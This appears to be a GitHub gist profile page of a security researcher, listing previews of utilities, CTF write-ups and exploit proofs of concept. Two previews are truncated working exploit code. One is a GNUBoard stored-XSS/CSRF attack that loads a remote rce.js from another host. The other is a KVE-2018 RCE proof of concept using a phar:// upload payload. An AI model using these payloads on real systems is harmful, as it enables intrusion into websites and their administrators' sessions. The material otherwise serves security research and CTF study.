Skip to content

Instantly share code, notes, and snippets.

View stypr's full-sized avatar
🆎**********************************
Be Lazy~

Harold Kim stypr

🆎**********************************
Be Lazy~
540 followers · 122 following
View GitHub Profile
@stypr
stypr / unzip_different_encoding.py
Created March 17, 2020 04:53
Unzip with different encoding
#!/usr/bin/python
#Nothing on stackoverflow works!
import zipfile
import sys
zip = zipfile.ZipFile('FILENAME', 'r')
zipinfo = zip.infolist()
for _file in zipinfo:
_file.filename = bytes(_file.filename).decode('cp949')
@stypr
stypr / exploit.html
Last active February 6, 2021 15:11
GNUBoard RCE ~2019.1
<!--
Stored XSS (2019.01.02)
-->
<form action="http://10.10.10.60/gnuboard5/adm/sms_admin/form_group_update.php" method="POST">
<input type='hidden' name='fg_no' value=''>
<input type='hidden' name='fg_name' id='payload' value=''>
</form>
<script>
var random = Math.round(Math.random() * 1000000000);
var script_url = '//10.10.10.30/vulnerable_rce_good_for_reason/rce.js'; // RCE from admin
@stypr
stypr / papago-api.php
Last active December 30, 2020 17:29
Deobfuscated Papago API (Python/Javascript/PHP) : Blocked as of December 2020
<?php
// Ported from papago.py
// v1: b64_enc(rot13([:16]) + [16:])
/* Derived from stackoverflow */
function uuidgen() {
return sprintf('%08x-%04x-%04x-%04x-%04x%08x',
mt_rand(0, 0xffffffff),
mt_rand(0, 0xffff), mt_rand(0, 0xffff), mt_rand(0, 0xffff),
mt_rand(0, 0xffff), mt_rand(0, 0xffffffff)
@stypr
stypr / README.md
Last active February 9, 2020 07:01
CodeGate 2019 CSP challenge writeup

Solution

  1. if(md5($salt.$api_string) !== $sig){ can be bypassed with hash length extension attack (didn't do it, but the key length is 12.)

  2. Use custom header and body to trigger CSP bypass.

@stypr
stypr / README.md
Last active September 18, 2019 09:56
2019 Cyber Operations Challenge Finals Pistol Exploit

Quick Summary

First-blooded this challenge. The server is down, I cannot explain briefly

  1. Comment in the website shows get_perm.php

  2. Another comment in the get_perm.php shows ?remote_debug=1.

  3. Using a php trick, you get a write post privilege.

@stypr
stypr / install.sh
Created August 16, 2019 09:05
Install MobSF Framework on CentOS 7 (with Headless Dynamic Analysis)
#!/bin/bash
# Maintainer: Harold Kim (root@stypr.com)
# Tested in CentOS 7.6.1810
# $ lsb_release -a
# LSB Version: :core-4.1-amd64:core-4.1-noarch
# Distributor ID: CentOS
# Description: CentOS Linux release 7.6.1810 (Core)
# Release: 7.6.1810
# Codename: Core
@stypr
stypr / composer.py
Last active August 17, 2019 19:45
Docker runner for CTF
#!/usr/bin/python
#-*- coding:utf-8 -*-
# Developer: Harold Kim (ho.kim@linecorp.com)
import os
import sys
import time
import urllib
import urllib2
@stypr
stypr / a-z.md
Last active July 22, 2023 12:35
Harekaze CTF 2019 WEB Writeup (Yokosuka Hackers)

A-z

Simple JS Jail challenge.

It is run on context, so we have nothing but to play with constructor and console.

1337 === eval(our_input)
@stypr
stypr / exploit.py
Last active August 17, 2019 19:28
CodeGate 2019: Rich Project exploit
import os
import urllib2
import urllib
import random
import sys
import time
import hashlib
def rand(sz=4):
return str(random.randint(10**sz, 100**sz))
@stypr
stypr / attack_script.js
Last active August 3, 2019 16:47
KVE-2018-0441, KVE-2018-0449 RCE PoC (Windows Only)
// 업로드한 파일의 페이로드.
// var payload = `phar://../data\\file/free/1062687231_CmB8gHok_143f7b739dcab1b6837abdfa39b0109467c35d51.gif/GIF89a.php`;
var payload = `[PAYLOAD_URL]`
// 먼저 공격에 앞서, 해당 기능을 지원하는 관리자인지 확인한다.
$.get(`../qa_config.php`, function(d){
// 수정할 곳은 ”파일 경로“ 가 들어간 곳이므로, 이 부분만 우선 확인한다.
if(d.indexOf(`상단 파일 경로`) !== false){